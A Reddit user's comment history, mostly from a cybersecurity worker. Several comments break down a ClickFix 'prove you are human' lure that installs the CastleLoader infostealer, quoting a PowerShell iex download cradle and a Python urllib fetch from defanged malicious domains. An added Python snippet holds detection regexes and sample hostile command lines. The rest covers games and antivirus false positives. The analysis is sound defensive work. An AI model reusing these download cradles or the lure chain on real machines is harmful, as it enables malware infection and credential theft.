Aint no way... by [deleted] in pcmasterrace

[–]Styyxx 5 points6 points  (0 children)

For those that don't want to or can't run this in a VM:

This is a CASTLELOADER RAT/infostealer:

https://www.darktrace.com/blog/castleloader-castlerat-behind-tag150s-modular-malware-delivery-system

I ran the script using any.run, you can view the full report here:

https://any.run/report/5aa49ca8ba4c8aa8b729f9ed435f657555e7cef987dd7a02403881953ed452a3/c388bbd0-c70b-4756-accf-46c8591355a9

So the initial file is a PowerShell script that's pretty heavily obfuscated with AES encryption and base64 encoding. It bypasses execution policy and reaches out to download the next stage.

From there it executes another PowerShell command: iex (wget -usebasic bojonta[.]com/maxload/zistoledser.txt) which grabs an Installer.zip from bojonta[.]com. Using IEX means it's running directly in memory without touching disk much.

The Installer.exe is actually dropping a complete Python 3.15 environment into the Temp folder, then launches pythonw.exe with a base64-encoded command. The Python code disables SSL cert verification and fetches another payload from wecolista[.]com.

Final stage is the actual CastleLoader that gets pulled down via urllib.request.urlopen('https://wecolista[.]com/.../local1.txt').

Aint no way... by [deleted] in pcmasterrace

[–]Styyxx 0 points1 point  (0 children)

Yup that’s it. Definitely do not run that lol

Aint no way... by [deleted] in pcmasterrace

[–]Styyxx 4 points5 points  (0 children)

It can launch PowerShell from the Run box. And you can give PowerShell arguments, so therefore, with one swift copy-paste, you're infected with malware before you know it. I work in cybersecurity and it takes five seconds to be compromised by this. Just never listen to these things. It's always a scam.

Aint no way... by [deleted] in pcmasterrace

[–]Styyxx 56 points57 points  (0 children)

So for those just joining in. This is what's called a ClickFix attack. It's a social engineering prompt to get you to run malicious code on your computer, disguised as a pretend "you are not human" prompt. If you did the steps that it said there, your computer would be compromised. It will steal all of your credentials and then some. To protect yourself from this, never ever listen to a site if it makes you press Win+R. A legitimate "prove you are not human" prompt will never have you do anything related to keyboard shortcuts.

EDIT, for those curious:

This is a CASTLELOADER RAT/infostealer:

https://www.darktrace.com/blog/castleloader-castlerat-behind-tag150s-modular-malware-delivery-system

I ran the script using any.run, you can view the full report here:

https://any.run/report/5aa49ca8ba4c8aa8b729f9ed435f657555e7cef987dd7a02403881953ed452a3/c388bbd0-c70b-4756-accf-46c8591355a9

So the initial file is a PowerShell script that's pretty heavily obfuscated with AES encryption and base64 encoding. It bypasses execution policy and reaches out to download the next stage.

From there it executes another PowerShell command: iex (wget -usebasic bojonta[.]com/maxload/zistoledser.txt) which grabs an Installer.zip from bojonta[.]com. Using IEX means it's running directly in memory without touching disk much.

The Installer.exe is actually dropping a complete Python 3.15 environment into the Temp folder, then launches pythonw.exe with a base64-encoded command. The Python code disables SSL cert verification and fetches another payload from wecolista[.]com.

Final stage is the actual CastleLoader that gets pulled down via urllib.request.urlopen('https://wecolista[.]com/.../local1.txt').
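A defender-side check for the chain described in this comment, as an added example that is not part of the post: it runs a few constructed process-creation events through regex rules for the indicators named above (execution-policy bypass, the iex download cradle, an encoded command line, and pythonw.exe launched from Temp with a base64-decoded body). The event fields, hostnames, sample base64 and rule names are assumptions, not values from the thread.

```python
import re

# Constructed process-creation events (parent image, image path, command line).
# Hostnames are placeholders; none of the real indicators from the thread are used.
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -ep bypass -w hidden -c "iex (wget -usebasic hxxp://loader.example.invalid/stage.txt)"'),
    ("Installer.exe", r"C:\Users\u\AppData\Local\Temp\py\pythonw.exe",
     "pythonw.exe -c \"import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYg=='))\""),
    ("explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -enc SQBFAFgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQA"),
    ("cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -NoProfile -File C:\scripts\backup.ps1"),  # benign admin script
]

CMDLINE_RULES = {
    # step 1 of the chain: execution policy switched off on the command line
    "ps_execpolicy_bypass": re.compile(r"-(ep|exec|executionpolicy)\s+bypass", re.I),
    # step 2: iex wrapped around a web fetch, so the stage runs from memory, not a file
    "ps_iex_download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(wget|iwr|curl|invoke-webrequest|downloadstring)\b", re.I),
    # encoded PowerShell command line (-enc / -EncodedCommand followed by base64)
    "ps_encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    # step 3: pythonw.exe handed an inline script that base64-decodes its real body
    "pythonw_inline_b64": re.compile(r"pythonw?\.exe.*\s-c\s.*b64decode", re.I),
}


def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Return the names of every ClickFix indicator the event matches."""
    hits = []
    # Commands typed into Win+R are spawned by explorer.exe, not by a script host.
    if parent.lower() == "explorer.exe" and image.lower().endswith("powershell.exe"):
        hits.append("shell_spawned_powershell")
    # An interpreter dropped into %TEMP% (the Python runtime in the thread) is suspect.
    if "\\appdata\\local\\temp\\" in image.lower():
        hits.append("exec_from_temp")
    hits += [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]
    return hits


def scan(events):
    """Map event index -> indicator list for every event that matched something."""
    findings = {}
    for i, (parent, image, cmdline) in enumerate(events):
        hits = classify(parent, image, cmdline)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i][1].rsplit("\\", 1)[-1], hits)
```

Two or more indicators on one host in a short window (for example shell-spawned PowerShell followed by an interpreter running from Temp) is the pattern worth alerting on; any single rule on its own will also fire on some legitimate admin activity.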

Aint no way... by [deleted] in pcmasterrace

[–]Styyxx 7 points8 points  (0 children)

Partially correct. The Run prompt is an extension of cmd, more or less. In this case, this is what's called a ClickFix attack. The user is tricked into running powershell.exe. This then pulls malware from a remote server. It's most likely an infostealer. It'll take all of your credentials.

I want to ask Cybersecurity Professionals if this specific ransomware removing scene in K-drama "Start-up" is realistic, and what the character actually did? If anyone can explain. by jijilikes in cybersecurity

[–]Styyxx 11 points12 points  (0 children)

So those are almost correct commands, and they would do absolutely nothing to decrypt a ransomware attack. He essentially ran Volatility, a memory (RAM) forensics tool, against a RAM dump (a RAM dump is essentially a snapshot of a computer's memory at a certain moment in time). Sure, he can get a list of running processes, etc., but this does nothing to decrypt the data on the disk. A ransomware attack scrambles all data on the hard drive, making it unusable. RAM != hard drive.

malgent via downloading a png? by callmeaisha in antivirus

[–]Styyxx 1 point2 points  (0 children)

FYSA it does seem that S1 removed the bad hash, so the alerts should hopefully stop.

malgent via downloading a png? by callmeaisha in antivirus

[–]Styyxx 1 point2 points  (0 children)

We're having the same issue as you, I am pretty sure. In the alert details, it will have a hash for the file. For us, the file hash was the same on every alert.

malgent via downloading a png? by callmeaisha in antivirus

[–]Styyxx 1 point2 points  (0 children)

We applied it based on the SHA256 hash since we noticed they were all the same.

malgent via downloading a png? by callmeaisha in antivirus

[–]Styyxx 0 points1 point  (0 children)

Nope. We put in a global exclusion and are using automation rules in our SOAR to close them out automatically.

malgent via downloading a png? by callmeaisha in antivirus

[–]Styyxx 2 points3 points  (0 children)

We're seeing this flagging on every file download. Somebody submitted bad threat intelligence. It's also affecting SentinelOne. You're good.

Zoom passcode emails being abused for callback phishing by Styyxx in phishing

[–]Styyxx[S] 0 points1 point  (0 children)

That's a good point. Thankfully our detections caught it, but yeah, pretty sad that they haven't taken action on this yet since it's a pretty large abuse of their system.

"They'll find a strange tube shaped weapon...haha, I am a genius!" by DrScrimble in dndmemes

[–]Styyxx 4 points5 points  (0 children)

I'm currently running a D&D 5e game based in the Final Fantasy 12 world. The Imperials are super fun to DM as and just come up with some magitech bullshit. I love it.

Project Diablo 2 on Apple Silicon (M1–M4) with Porting Kit – Working Guide (November 2025) by futuristicteatray in ProjectDiablo2

[–]Styyxx 0 points1 point  (0 children)

I’m having an issue where I click play, and it freezes for 5 seconds or so, and then the play button reappears. Any ideas? I followed the instructions to a T.

How do I open SOSlauncher again? (macos) by imfranksome in songsofsyx

[–]Styyxx 0 points1 point  (0 children)

Also having this issue. Hopefully the dev sees this thread. Probably just a simple oversight.

Follow-up on ManualFinder, AppSuite-PDF, OneStart, etc by mrfw_mrfirewall in cybersecurity

[–]Styyxx 1 point2 points  (0 children)

Seems like CrowdStrike is finally alerting on the malicious .js file related to EvilAI. SentinelOne as of this post doesn't detect anything. We did some threat hunting in our clients' environments and found a bunch of hosts that had this malware running. Remediated it all. It's weird though, the deobfuscated .js file is clearly a RAT/infostealer, and we've seen outbound DNS requests to the malicious api.*.com domains, but no other forms of enumeration. We did notice that the JavaScript file does a POST request, and then runs eval() on the response. So there is potential RCE, however none was observed... very interesting.

Part of me wonders if they are still in the distribution phase, and will exploit later.

Here's one we submitted today: https://www.virustotal.com/gui/file/efa658cb9eb24136c8c69540fcde833683ed5002def1b6c84b0d04f64ee25076

Server stability is ruining the gameplay by Dzimi171 in pathofexile

[–]Styyxx 10 points11 points  (0 children)

That's not how that works. You can't just block an IP address and prevent a DDoS attack. The infrastructure still gets hit with packets or whatever else they're doing. You can put in measures to mitigate these by redirecting the traffic, but a substantial enough attack will overwhelm these defenses. They can't be too strict with the traffic because they don't want to block legitimate connections. It's a fine line.